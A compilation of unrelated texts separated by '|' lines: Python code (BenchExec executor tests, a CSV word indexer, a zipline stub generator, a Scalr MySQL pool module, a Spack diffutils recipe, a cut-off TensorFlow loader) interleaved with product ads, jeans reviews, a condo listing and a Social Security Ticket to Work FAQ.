with open(tmp.name, "rt") as tmp2:
self.assertMultiLineEqual(tmp2.read(), content)
REDUCE_WARNING_MSG = (
"WARNING: YOUR LOGFILE WAS TOO LONG, SOME LINES IN THE MIDDLE WERE REMOVED."
)
REDUCE_OVERHEAD = 100
def test_reduce_file_size(self):
with tempfile.NamedTemporaryFile(mode="wt") as tmp:
line = "Some text\n"
tmp.write(line * 500)
tmp.flush()
limit = 500
runexecutor._reduce_file_size_if_necessary(tmp.name, limit)
self.assertLessEqual(
os.path.getsize(tmp.name), limit + self.REDUCE_OVERHEAD
)
with open(tmp.name, "rt") as tmp2:
new_content = tmp2.read()
self.assertIn(self.REDUCE_WARNING_MSG, new_content)
self.assertTrue(new_content.startswith(line))
self.assertTrue(new_content.endswith(line))
def test_reduce_file_size_limit_zero(self):
with tempfile.NamedTemporaryFile(mode="wt") as tmp:
line = "Some text\n"
tmp.write(line * 500)
tmp.flush()
runexecutor._reduce_file_size_if_necessary(tmp.name, 0)
self.assertLessEqual(os.path.getsize(tmp.name), self.REDUCE_OVERHEAD)
with open(tmp.name, "rt") as tmp2:
new_content = tmp2.read()
self.assertIn(self.REDUCE_WARNING_MSG, new_content)
self.assertTrue(new_content.startswith(line))
def test_append_crash_dump_info(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(result, output) = self.execute_run(
"/bin/sh",
"-c",
'echo "# An error report file with more information is saved as:";'
'echo "# $(pwd)/hs_err_pid_1234.txt";'
"echo TEST_TOKEN > hs_err_pid_1234.txt;"
"exit 2",
)
self.assertEqual(
output[-1], "TEST_TOKEN", "log file misses content from crash dump file"
)
def test_integration(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
(result, output) = self.execute_run_extern("/bin/echo", "TEST_TOKEN")
self.check_exitcode_extern(result, 0, "exit code of /bin/echo is not zero")
self.check_result_keys(result, "returnvalue")
self.check_command_in_output(output, "/bin/echo TEST_TOKEN")
self.assertEqual(output[-1], "TEST_TOKEN", "run output misses command output")
for line in output[1:-1]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_home_and_tmp_is_separate(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(result, output) = self.execute_run("/bin/sh", "-c", "echo $HOME $TMPDIR")
self.check_exitcode(result, 0, "exit code of /bin/sh is not zero")
self.assertRegex(
output[-1],
"/BenchExec_run_[^/]*/home .*/BenchExec_run_[^/]*/tmp",
"HOME or TMPDIR variable does not contain expected temporary directory",
)
def test_temp_dirs_are_removed(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(result, output) = self.execute_run("/bin/sh", "-c", "echo $HOME $TMPDIR")
self.check_exitcode(result, 0, "exit code of /bin/sh is not zero")
home_dir = output[-1].split(" ")[0]
temp_dir = output[-1].split(" ")[1]
self.assertFalse(
os.path.exists(home_dir),
f"temporary home directory {home_dir} was not cleaned up",
)
self.assertFalse(
os.path.exists(temp_dir),
f"temporary temp directory {temp_dir} was not cleaned up",
)
def test_home_is_writable(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
(result, output) = self.execute_run("/bin/sh", "-c", "touch $HOME/TEST_FILE")
self.check_exitcode(
result,
0,
f"Failed to write to $HOME/TEST_FILE, output was\n{output}",
)
def test_no_cleanup_temp(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
self.setUp(cleanup_temp_dir=False) # create RunExecutor with desired parameter
(result, output) = self.execute_run(
"/bin/sh", "-c", 'echo "$TMPDIR"; echo "" > "$TMPDIR/test"'
)
self.check_exitcode(result, 0, "exit code of /bin/sh is not zero")
temp_dir = output[-1]
test_file = os.path.join(temp_dir, "test")
subprocess.run(["test", "-f", test_file], check=True)
self.assertEqual(
"tmp", os.path.basename(temp_dir), "unexpected name of temp dir"
)
self.assertNotEqual(
"/tmp", temp_dir, "temp dir should not be the global temp dir"
)
subprocess.run(["rm", "-r", os.path.dirname(temp_dir)], check=True)
def test_require_cgroup_invalid(self):
with self.assertLogs(level=logging.ERROR) as log:
with self.assertRaises(SystemExit):
RunExecutor(additional_cgroup_subsystems=["invalid"])
self.assertIn(
'Cgroup subsystem "invalid" was required but is not available',
"\n".join(log.output),
)
def test_require_cgroup_cpu(self):
try:
self.setUp(additional_cgroup_subsystems=["cpu"])
except SystemExit as e:
self.skipTest(e)
if not os.path.exists("/bin/cat"):
self.skipTest("missing /bin/cat")
(result, output) = self.execute_run("/bin/cat", "/proc/self/cgroup")
self.check_exitcode(result, 0, "exit code of /bin/cat is not zero")
for line in output:
if re.match(r"^[0-9]*:([^:]*,)?cpu(,[^:]*)?:/(.*/)?benchmark_.*$", line):
return # Success
self.fail("Not in expected cgroup for subsystem cpu:\n" + "\n".join(output))
def test_set_cgroup_cpu_shares(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
try:
self.setUp(additional_cgroup_subsystems=["cpu"])
except SystemExit as e:
self.skipTest(e)
(result, _) = self.execute_run(
"/bin/echo", cgroupValues={("cpu", "shares"): 42}
)
self.check_exitcode(result, 0, "exit code of /bin/echo is not zero")
# Just assert that execution was successful,
# testing that the value was actually set is much more difficult.
def test_nested_runexec(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
self.setUp(
dir_modes={
# Do not mark /home hidden, would fail with python from virtualenv
"/": containerexecutor.DIR_READ_ONLY,
"/tmp": containerexecutor.DIR_FULL_ACCESS, # for inner_output_file
"/sys/fs/cgroup": containerexecutor.DIR_FULL_ACCESS,
}
)
inner_args = ["--", "/bin/echo", "TEST_TOKEN"]
with tempfile.NamedTemporaryFile(
mode="r", prefix="inner_output_", suffix=".log"
) as inner_output_file:
inner_cmdline = self.get_runexec_cmdline(
*inner_args, output_filename=inner_output_file.name
)
outer_result, outer_output = self.execute_run(*inner_cmdline)
inner_output = inner_output_file.read().strip().splitlines()
logging.info("Outer output:\n%s", "\n".join(outer_output))
logging.info("Inner output:\n%s", "\n".join(inner_output))
self.check_result_keys(outer_result, "returnvalue")
self.check_exitcode(outer_result, 0, "exit code of inner runexec is not zero")
self.check_command_in_output(inner_output, "/bin/echo TEST_TOKEN")
self.assertEqual(
inner_output[-1], "TEST_TOKEN", "run output misses command output"
)
def test_starttime(self):
if not os.path.exists("/bin/echo"):
self.skipTest("missing /bin/echo")
before = util.read_local_time()
(result, _) = self.execute_run("/bin/echo")
after = util.read_local_time()
self.check_result_keys(result)
run_starttime = result["starttime"]
self.assertIsNotNone(run_starttime.tzinfo, "start time is not a local time")
self.assertLessEqual(before, run_starttime)
self.assertLessEqual(run_starttime, after)
class TestRunExecutorWithContainer(TestRunExecutor):
def setUp(self, *args, **kwargs):
try:
container.execute_in_namespace(lambda: 0)
except OSError as e:
self.skipTest(f"Namespaces not supported: {os.strerror(e.errno)}")
dir_modes = kwargs.pop(
"dir_modes",
{
"/": containerexecutor.DIR_READ_ONLY,
"/home": containerexecutor.DIR_HIDDEN,
"/tmp": containerexecutor.DIR_HIDDEN,
},
)
self.runexecutor = RunExecutor(
use_namespaces=True, dir_modes=dir_modes, *args, **kwargs
)
def get_runexec_cmdline(self, *args, **kwargs):
return [
"python3",
runexec,
"--container",
"--read-only-dir",
"/",
"--hidden-dir",
"/home",
"--hidden-dir",
"/tmp",
"--dir",
"/tmp",
"--output",
kwargs["output_filename"],
] + list(args)
def execute_run(self, *args, **kwargs):
return super(TestRunExecutorWithContainer, self).execute_run(
workingDir="/tmp", *args, **kwargs
)
def test_home_and_tmp_is_separate(self):
self.skipTest("not relevant in container")
def test_temp_dirs_are_removed(self):
self.skipTest("not relevant in container")
def test_no_cleanup_temp(self):
self.skipTest("not relevant in container")
def check_result_files(
self, shell_cmd, result_files_patterns, expected_result_files
):
output_dir = tempfile.mkdtemp("", "output_")
try:
result, output = self.execute_run(
"/bin/sh",
"-c",
shell_cmd,
output_dir=output_dir,
result_files_patterns=result_files_patterns,
)
output_str = "\n".join(output)
self.assertEqual(
result["exitcode"].value,
0,
f"exit code of {' '.join(shell_cmd)} is not zero,\n"
f"result was {result!r},\noutput was\n{output_str}",
)
result_files = []
for root, _unused_dirs, files in os.walk(output_dir):
for file in files:
result_files.append(
os.path.relpath(os.path.join(root, file), output_dir)
)
expected_result_files.sort()
result_files.sort()
self.assertListEqual(
result_files,
expected_result_files,
f"\nList of retrieved result files differs from expected list,\n"
f"result was {result!r},\noutput was\n{output_str}",
)
finally:
shutil.rmtree(output_dir, ignore_errors=True)
def test_result_file_simple(self):
self.check_result_files("echo TEST_TOKEN > TEST_FILE", ["."], ["TEST_FILE"])
def test_result_file_recursive(self):
self.check_result_files(
"mkdir TEST_DIR; echo TEST_TOKEN > TEST_DIR/TEST_FILE",
["."],
["TEST_DIR/TEST_FILE"],
)
def test_result_file_multiple(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; echo TEST_TOKEN > TEST_FILE2",
["."],
["TEST_FILE", "TEST_FILE2"],
)
def test_result_file_symlink(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; ln -s TEST_FILE TEST_LINK",
["."],
["TEST_FILE"],
)
def test_result_file_no_match(self):
self.check_result_files("echo TEST_TOKEN > TEST_FILE", ["NO_MATCH"], [])
def test_result_file_no_pattern(self):
self.check_result_files("echo TEST_TOKEN > TEST_FILE", [], [])
def test_result_file_empty_pattern(self):
self.assertRaises(
ValueError,
lambda: self.check_result_files("echo TEST_TOKEN > TEST_FILE", [""], []),
)
def test_result_file_partial_match(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; mkdir TEST_DIR; echo TEST_TOKEN > TEST_DIR/TEST_FILE",
["TEST_DIR"],
["TEST_DIR/TEST_FILE"],
)
def test_result_file_multiple_patterns(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; "
"echo TEST_TOKEN > TEST_FILE2; "
"mkdir TEST_DIR; "
"echo TEST_TOKEN > TEST_DIR/TEST_FILE; ",
["TEST_FILE", "TEST_DIR/TEST_FILE"],
["TEST_FILE", "TEST_DIR/TEST_FILE"],
)
def test_result_file_wildcard(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; "
"echo TEST_TOKEN > TEST_FILE2; "
"echo TEST_TOKEN > TEST_NOFILE; ",
["TEST_FILE*"],
["TEST_FILE", "TEST_FILE2"],
)
def test_result_file_absolute_pattern(self):
self.check_result_files("echo TEST_TOKEN > TEST_FILE", ["/"], ["tmp/TEST_FILE"])
def test_result_file_absolute_and_pattern(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE; mkdir TEST_DIR; echo TEST_TOKEN > TEST_DIR/TEST_FILE",
["TEST_FILE", "/tmp/TEST_DIR"],
["tmp/TEST_FILE", "tmp/TEST_DIR/TEST_FILE"],
)
def test_result_file_relative_traversal(self):
self.check_result_files(
"echo TEST_TOKEN > TEST_FILE", ["foo/../TEST_FILE"], ["TEST_FILE"]
)
def test_result_file_illegal_relative_traversal(self):
self.assertRaises(
ValueError,
lambda: self.check_result_files(
"echo TEST_TOKEN > TEST_FILE", ["foo/../../bar"], []
),
)
def test_result_file_recursive_pattern(self):
self.check_result_files(
"mkdir -p TEST_DIR/TEST_DIR; "
"echo TEST_TOKEN > TEST_FILE.txt; "
"echo TEST_TOKEN > TEST_DIR/TEST_FILE.txt; "
"echo TEST_TOKEN > TEST_DIR/TEST_DIR/TEST_FILE.txt; ",
["**/*.txt"],
[
"TEST_FILE.txt",
"TEST_DIR/TEST_FILE.txt",
"TEST_DIR/TEST_DIR/TEST_FILE.txt",
],
)
def test_file_count_limit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
self.setUp(container_tmpfs=False) # create RunExecutor with desired parameter
filehierarchylimit._CHECK_INTERVAL_SECONDS = 0.1
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"for i in $(seq 1 10000); do touch $i; done",
files_count_limit=100,
result_files_patterns=None,
expect_terminationreason="files-count",
)
self.check_exitcode(result, 9, "exit code of killed process is not 15")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_file_size_limit(self):
if not os.path.exists("/bin/sh"):
self.skipTest("missing /bin/sh")
self.setUp(container_tmpfs=False) # create RunExecutor with desired parameter
filehierarchylimit._CHECK_INTERVAL_SECONDS = 0.1
(result, output) = self.execute_run(
"/bin/sh",
"-c",
"for i in $(seq 1 100000); do echo $i >> TEST_FILE; done",
files_size_limit=100,
result_files_patterns=None,
expect_terminationreason="files-size",
)
self.check_exitcode(result, 9, "exit code of killed process is not 15")
for line in output[1:]:
self.assertRegex(line, "^-*$", "unexpected text in run output")
def test_path_with_space(self):
temp_dir = tempfile.mkdtemp(prefix="BenchExec test")
try:
# create RunExecutor with desired parameter
self.setUp(
dir_modes={
"/": containerexecutor.DIR_READ_ONLY,
"/home": containerexecutor.DIR_HIDDEN,
"/tmp": containerexecutor.DIR_HIDDEN,
temp_dir: containerexecutor.DIR_FULL_ACCESS,
}
)
temp_file = os.path.join(temp_dir, "TEST_FILE")
result, output = self.execute_run(
"/bin/sh", "-c", f"echo TEST_TOKEN > '{temp_file}'"
)
self.check_result_keys(result)
self.check_exitcode(result, 0, "exit code of process is not 0")
self.assertTrue(
os.path.exists(temp_file),
f"File '{temp_file}' not created, output was:\n" + "\n".join(output),
)
with open(temp_file, "r") as f:
self.assertEqual(f.read().strip(), "TEST_TOKEN")
finally:
shutil.rmtree(temp_dir)
def test_uptime_with_lxcfs(self):
if not os.path.exists("/var/lib/lxcfs/proc"):
self.skipTest("missing lxcfs")
result, output = self.execute_run("cat", "/proc/uptime")
self.check_result_keys(result)
self.check_exitcode(result, 0, "exit code for reading uptime is not zero")
uptime = float(output[-1].split(" ")[0])
self.assertLessEqual(
uptime, 10, f"Uptime {uptime}s unexpectedly high in container"
)
def test_uptime_without_lxcfs(self):
if not os.path.exists("/var/lib/lxcfs/proc"):
self.skipTest("missing lxcfs")
# create RunExecutor with desired parameter
self.setUp(container_system_config=False)
result, output = self.execute_run("cat", "/proc/uptime")
self.check_result_keys(result)
self.check_exitcode(result, 0, "exit code for reading uptime is not zero")
uptime = float(output[-1].split(" ")[0])
# If uptime was less than 10s, LXCFS probably was in use
self.assertGreaterEqual(
uptime, 10, f"Uptime {uptime}s unexpectedly low in container"
)
class _StopRunThread(threading.Thread):
def __init__(self, delay, runexecutor):
super(_StopRunThread, self).__init__()
self.daemon = True
self.delay = delay
self.runexecutor = runexecutor
def run(self):
time.sleep(self.delay)
self.runexecutor.stop()
class TestRunExecutorUnits(unittest.TestCase):
"""unit tests for parts of RunExecutor"""
def test_get_debug_output_with_error_report_and_invalid_utf8(self):
invalid_utf8 = b"\xFF"
with tempfile.NamedTemporaryFile(mode="w+b", delete=False) as report_file:
with tempfile.NamedTemporaryFile(mode="w+b") as output:
output_content = f"""Dummy output
# An error report file with more information is saved as:
# {report_file.name}
More output
""".encode()
report_content = b"Report output\nMore lines"
output_content += invalid_utf8
report_content += invalid_utf8
output.write(output_content)
output.flush()
output.seek(0)
report_file.write(report_content)
report_file.flush()
runexecutor._get_debug_output_after_crash(output.name, "")
self.assertFalse(os.path.exists(report_file.name))
self.assertEqual(output.read(), output_content + report_content)
|
Smooth up and down scrolling menu.
Dale Earnhardt wins the Daytona 500. Listen as he speaks about his win. Watch his victory spin! In memory of a hero.
AutoPlayer14 is a keyboard macro player for AutoCAD R14. Provides pause for user input mechanism and a easy to use interface.
|
import csv
import sys
#TODO take a schema as input
class WordIndexer:
def __init__(self, indexf):
self.words = {}
self.count = 0
self.indexfw = open(indexf, 'w')
def add_word(self, w):
if w in self.words:
return self.words[w]
else:
self.indexfw.write(w+'\n')
t = self.count
self.count += 1
self.words[w] = t
return t
def close(self):
self.indexfw.close()
def indexing(inputf, delim_in):
intfile = inputf + '.i'
indexf = inputf + '.index'
delim_out = ' '
wi = WordIndexer(indexf)
with open(inputf, 'r') as ins:
reader = csv.reader(ins, delimiter=delim_in)
with open(intfile, 'w') as outs:
writer = csv.writer(outs, delimiter=delim_out)
for row in reader:
cols = [wi.add_word(w) for w in row]
writer.writerow(cols)
wi.close()
return intfile, indexf
if __name__ == '__main__':
if len(sys.argv) < 2:
raise Exception("usage: %s inputfile [delim]" % sys.argv[0])
if len(sys.argv) == 3:
delim = sys.argv[2]
else:
delim = ' '
indexing(sys.argv[1], delim_in=delim)
|
Large living room and dining room with panoramic view of Bangkok. Kitchen is fully equipped with quality brands equipment. The unit is fully furnished with special selected art pieces and furnitures from all over the world.
The building has a large salt water swimming pool, playground and garden. 24- security, basketball court and gym.
|
import inspect
from operator import attrgetter
from textwrap import dedent
from zipline import api, TradingAlgorithm
def main():
with open(api.__file__.rstrip('c') + 'i', 'w') as stub:
# Imports so that Asset et al can be resolved.
# "from MOD import *" will re-export the imports from the stub, so
# explicitly importing.
stub.write(dedent("""\
import collections
from zipline.assets import Asset, Equity, Future
from zipline.assets.futures import FutureChain
from zipline.finance.asset_restrictions import Restrictions
from zipline.finance.cancel_policy import CancelPolicy
from zipline.pipeline import Pipeline
from zipline.protocol import Order
from zipline.utils.events import EventRule
from zipline.utils.security_list import SecurityList
"""))
# Sort to generate consistent stub file:
for api_func in sorted(TradingAlgorithm.all_api_methods(),
key=attrgetter('__name__')):
sig = inspect._signature_bound_method(inspect.signature(api_func))
indent = ' ' * 4
stub.write(dedent('''\
def {func_name}{func_sig}:
"""'''.format(func_name=api_func.__name__,
func_sig=sig)))
stub.write(dedent('{indent}{func_doc}'.format(
func_doc=api_func.__doc__ or '\n', # handle None docstring
indent=indent,
)))
stub.write('{indent}"""\n\n'.format(indent=indent))
if __name__ == '__main__':
main()
|
Help your GMC G1500 run better.
Use K&N's application search to find the right air filter for your GMC. Upgrade your GMC G1500 today with a K&N air filter. K&N automotive replacement air filters are a top performance accessory that can help your car or truck run better.
|
import time
import socket
import threading
import pymysql
import pymysql.err
import pymysql.cursors
from scalrpy.util import helper
from scalrpy import LOG
def make_connection(config, autocommit=True):
connection = pymysql.connect(
user=config['user'],
passwd=config['pass'],
db=config['name'],
host=config['host'],
port=config['port'],
cursorclass=pymysql.cursors.DictCursor,
connect_timeout=config.get('timeout', 10)
)
connection.autocommit(autocommit)
return connection
def validate_connection(connection):
try:
return connection.ping()
except:
try:
connection.close()
except:
pass
return False
class DB(object):
def __init__(self, config, pool_size=None):
self._local = threading.local()
def _make_connection():
return make_connection(config, autocommit=True)
def _validate_connection(connection):
return validate_connection(connection)
self._connection_pool = helper.Pool(
_make_connection,
_validate_connection,
pool_size if pool_size else config.get('pool_size', 4))
def autocommit(self, state):
if state and self._connection:
self._connection_pool.put(self._local.connection)
self._local.cursor.close()
self._local.cursor = None
self._local.connection = None
self._local.autocommit = bool(state)
@property
def _connection(self):
try:
return self._local.connection
except AttributeError:
self._local.connection = None
return self._local.connection
@property
def _autocommit(self):
try:
return self._local.autocommit
except AttributeError:
self._local.autocommit = True
return self._local.autocommit
def execute(self, query, retries=0, retry_timeout=10):
while True:
try:
if self._autocommit or not self._connection:
self._local.connection = self._connection_pool.get(timeout=10)
self._local.connection.autocommit(self._autocommit)
self._local.cursor = self._connection.cursor()
try:
start_time = time.time()
self._local.cursor.execute(query)
end_time = time.time()
if end_time - start_time > 1:
LOG.debug('Query too slow: %s\n%s...' %
(end_time - start_time, query[:150]))
results = self._local.cursor.fetchall()
if results is not None:
results = tuple(results)
return results
finally:
if self._autocommit:
self._local.cursor.close()
self._connection_pool.put(self._local.connection)
self._local.connection = None
self._local.cursor = None
except (pymysql.err.OperationalError, pymysql.err.InternalError, socket.timeout):
if not retries:
raise
retries -= 1
time.sleep(retry_timeout)
def execute_with_limit(self, query, limit, max_limit=None, retries=0, retry_timeout=10):
"""
:returns: generator
"""
if max_limit:
i, chunk_size = 0, min(limit, max_limit)
else:
i, chunk_size = 0, limit
while True:
is_last_iter = bool(max_limit) and (i + 1) * chunk_size > max_limit
if is_last_iter:
limit_query = query + \
" LIMIT %s, %s" % (i * chunk_size, max_limit - i * chunk_size)
else:
limit_query = query + " LIMIT %s, %s" % (i * chunk_size, chunk_size)
results = self.execute(limit_query, retries=retries, retry_timeout=retry_timeout)
if not results:
break
yield results
if len(results) < limit or is_last_iter:
break
i += 1
def commit(self):
if self._connection:
self._local.connection.commit()
self._local.cursor.close()
def rollback(self):
if self._connection:
self._connection.rollback()
class ScalrDB(DB):
def load_server_properties(self, servers, names):
names = list(names)
servers_id = list(set(server['server_id'] for server in servers if server['server_id']))
if not servers_id:
return
query = (
"SELECT server_id, name, value "
"FROM server_properties "
"WHERE name IN ({0}) "
"AND server_id IN ({1})"
).format(str(names)[1:-1], str(servers_id)[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp.setdefault(result['server_id'], {}).update({result['name']: result['value']})
for server in servers:
if server['server_id'] not in tmp:
continue
for k, v in tmp[server['server_id']].iteritems():
if k in server and server[k]:
continue
server[k] = v
return
def load_client_environment_properties(self, envs, names):
names = list(names)
envs_ids = list(set(env['id'] for env in envs if env['id'] or env['id'] == 0))
if not envs_ids:
return tuple()
query = (
"SELECT env_id, name, value "
"FROM client_environment_properties "
"WHERE name IN ({0}) "
"AND env_id IN ({1})"
).format(str(names)[1:-1], str(envs_ids).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp.setdefault(result['env_id'], {}).update({result['name']: result['value']})
for env in envs:
if env['id'] not in tmp:
continue
for k, v in tmp[env['id']].iteritems():
if k in env and env[k]:
continue
env[k] = v
return
def load_farm_settings(self, farms, names):
names = list(names)
farms_ids = list(set(farm['id'] for farm in farms if farm['id'] or farm['id'] == 0))
if not farms_ids:
return dict()
query = (
"SELECT farmid farm_id, name, value "
"FROM farm_settings "
"WHERE name IN({0}) "
"AND farmid IN ({1})"
).format(str(names)[1:-1], str(farms_ids).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp.setdefault(result['farm_id'], {}).update({result['name']: result['value']})
for farm in farms:
if farm['id'] not in tmp:
continue
for k, v in tmp[farm['id']].iteritems():
if k in farm and farm[k]:
continue
farm[k] = v
return
def load_farm_role_settings(self, farms_roles, names):
names = list(names)
farms_roles_ids = list(set(_['id'] for _ in farms_roles if _['id'] or _['id'] == 0))
if not farms_roles_ids:
return dict()
query = (
"SELECT farm_roleid, name, value "
"FROM farm_role_settings "
"WHERE name IN ({0}) "
"AND farm_roleid IN ({1})"
).format(str(names)[1:-1], str(farms_roles_ids).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp.setdefault(result['farm_roleid'], {}).update({result['name']: result['value']})
for farm_role in farms_roles:
if farm_role['id'] not in tmp:
continue
for k, v in tmp[farm_role['id']].iteritems():
if k in farm_role and farm_role[k]:
continue
farm_role[k] = v
return
def load_vpc_settings(self, servers):
# ec2.vpc.id
farms_id = list(set([_['farm_id'] for _ in servers if _['farm_id'] or _['farm_id'] == 0]))
if not farms_id:
return
query = (
"SELECT farmid, value "
"FROM farm_settings "
"WHERE name = 'ec2.vpc.id' "
"AND farmid IN ({0})"
).format(str(farms_id).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp[result['farmid']] = result['value']
for server in servers:
if server['farm_id'] not in tmp:
continue
server['ec2.vpc.id'] = tmp[server['farm_id']]
# router_role_id
farms_role_id = list(set([_['farm_roleid'] for _ in servers if 'ec2.vpc.id' in _]))
if not farms_role_id:
return
# get router role id from farm_role_settings
query = (
"SELECT farm_roleid, value "
"FROM farm_role_settings "
"WHERE name = 'router.scalr.farm_role_id' "
"AND farm_roleid IN ({0}) "
).format(str(farms_role_id).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp[result['farm_roleid']] = int(result['value'])
for server in servers:
if server['farm_roleid'] not in tmp:
continue
# router.scalr.farm_role_id has int type
server['router_role_id'] = int(tmp[server['farm_roleid']])
# get router role id from farm_roles
query = (
"SELECT id router_role_id, farmid "
"FROM farm_roles "
"WHERE role_id IN "
"(SELECT role_id FROM role_behaviors WHERE behavior='router') "
"AND farmid IN ({0})"
).format(str(farms_id).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp[result['farmid']] = result['router_role_id']
for server in servers:
if 'router_role_id' not in server and server['farm_id'] in tmp:
server['router_role_id'] = tmp[server['farm_id']]
# router_vpc_ip
routers_role_id = list(set(_['router_role_id']
for _ in servers if 'ec2.vpc.id' in _ and 'router_role_id' in _))
if not routers_role_id:
return
query = (
"SELECT farm_roleid, value "
"FROM farm_role_settings "
"WHERE name = 'router.vpc.ip' "
"AND farm_roleid IN ({0})"
).format(str(routers_role_id).replace('L', '')[1:-1])
results = self.execute(query)
tmp = dict()
for result in results:
tmp[result['farm_roleid']] = result['value']
for server in servers:
if 'router_role_id' in server and server['router_role_id'] in tmp:
server['router.vpc.ip'] = tmp[server['router_role_id']]
return
|
The perfect balance of slim and slouchy. Our Sienna Slim Boyfriend is reflective of the tapered boyfriend fit you love, featuring classic 5-pocket styling, a button fly closure and a destroyed front in a bold fiery hue. Size up for extra chill points, or size down for fitted ease.
The color is so great! The waist was a bit big but can use a belt to cover up.
Fabric is harder to hen most Lucky jeans I've ever had. And the size runs small.
Not your usual jeans , they stand out and are so comfy!!
Love these pants! Great color abs perfect fit!
Definitely order a size smaller than your normal size. I read other reviews suggesting that and am glad I listened. These are boxy stiff looking jeans but cute because of the color. Good quality and I disagree with negative comments about the stability of the fabric because of the holes. They will surely hold up to multiple washings and maybe get better and softer with age.
Love the color and fit of these jeans. Perfect fit. Can be dressed up or casual.
I can't wait to wear these sassy jeans on my vacation!
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import re
from spack import *
class Diffutils(AutotoolsPackage, GNUMirrorPackage):
"""GNU Diffutils is a package of several programs related to finding
differences between files."""
executables = [r'^diff$']
homepage = "https://www.gnu.org/software/diffutils/"
gnu_mirror_path = "diffutils/diffutils-3.7.tar.xz"
version('3.7', sha256='b3a7a6221c3dc916085f0d205abf6b8e1ba443d4dd965118da364a1dc1cb3a26')
version('3.6', sha256='d621e8bdd4b573918c8145f7ae61817d1be9deb4c8d2328a65cea8e11d783bd6')
build_directory = 'spack-build'
patch('nvhpc.patch', when='@3.7 %nvhpc')
depends_on('iconv')
def setup_build_environment(self, env):
if self.spec.satisfies('%fj'):
env.append_flags('CFLAGS',
'-Qunused-arguments')
@classmethod
def determine_version(cls, exe):
output = Executable(exe)('--version', output=str, error=str)
match = re.search(r'diff \(GNU diffutils\) (\S+)', output)
return match.group(1) if match else None
|
Assures that more Americans with disabilities have the opportunity to participate in the workforce and lessen their dependence on public benefits.
The Ticket Program is free and voluntary and will offer Social Security beneficiaries with disabilities/blindness a greater choice in obtaining the services they need to help them go to work.
Where would I take my Ticket to Work to receive services?
You should take your Ticket to an employment network. An employment network is a private organization or public agency, including the state vocational rehabilitation agency, which has agreed to work with Social Security to provide services under the Ticket to Work program.
You may contact Maximus, the Operations Support Manager at the toll-free numbers below for information about employment networks that serve the area where you live. You may also find this information on their website at https://choosework.ssa.gov/.
Also, some employment networks may contact you to offer their services. You can get information from MAXIMUS by calling them at their toll-free numbers, 1-866-968-7842 (1-866-yourticket) or 1-866-833-2967 TTY (1-866-TDD2work).
Work Incentives are disability program rules that allow you to reduce your countable income so that you can continue to receive a cash benefit while you explore work or look for a job that is right for you. Examples of such Work Incentives include the extension of Medicare and Medicaid coverage while working, Impairment-Related Work Expenses, and Plans for Achieving Self-Support. In addition, if your work attempt is unsuccessful, SSA has made it easy for you to get back on benefits when and if needed.
View our “Determine Work Incentives” tab for more information about Work Incentives!
Going to work seems complicated. Is there someone who can help me understand the disability program rules and Work Incentives?
Plan to Work Community Work Incentive Coordinators provide information and planning services about work and Work Incentives to individuals 14 to full retirement age who are eligible for SSDI and/or SSI benefits. They can answer questions about how part-time, full-time, or seasonal work would affect your benefits.
Plan to Work can also discuss your individual employment goals, assist you in identifying possible barriers to reaching those goals, and help you find the resources or services to overcome those barriers. Services are FREE, and available in all counties in Washington State, except Pacific, Lewis, Wahkiakum, Cowlitz, Clark, Skamania, Klickitat, Benton, Franklin, and Walla Walla Counties. Call Plan to Work at (866) 497-9443 or the Ticket to Work Helpline at (866) 968-7842 for more information.
Yes. There is a program called Protection and Advocacy for Beneficiaries of Social Security (PABSS). Protection and Advocacy (P&A) systems are publicly funded entities that provide protection and advocacy services free of charge to individuals with disabilities. SSA provides funding to the P&As to implement the PABSS program. PABSS staff assist people receiving Social Security disability benefits with disabilities in obtaining information and advice about receiving vocational rehabilitation and employment services.
P&As provide advocacy and other related services that people receiving Social Security disability benefits with disabilities may need to secure or regain gainful employment. Many P&As administer the Client Assistance Program (CAP) that assists individuals with disabilities in securing services from State VR agencies.
Disability Rights Washington is the PABSS in Washington State. Visit their website for more details about who they are and what they do!
|
import tensorflow as tf
import numpy as np
import struct
import math
import os
path=os.path.dirname(os.path.realpath(__file__))
def normalize(v):
norm=np.linalg.norm(v)
if norm==0:
return v
return v/norm
def readToLines(file):
csvFile=open(file)
lines=csvFile.read().splitlines()
csvFile.close()
splitLines=[]
for line in lines:
splitLines+=[line.split(',')]
return splitLines
FEATURES=4
NUM_CLASSES=3
hidden1_num_neurons=2 #neurons in first layer
output_num_neurons=NUM_CLASSES #neurons in second (output) layer. Each neuron corresponds to a digit. The classification is the order of the
#output neuron with the highest activation
#function to read MNIST images and labels into numpy matrices
def loadData(file):
splitLines=readToLines(file)
global FEATURES
vocab = list(set(splitLines))
features=np.zeros([len(splitLines)-1, FEATURES])
labels=np.zeros([len(splitLines)-1, NUM_CLASSES])
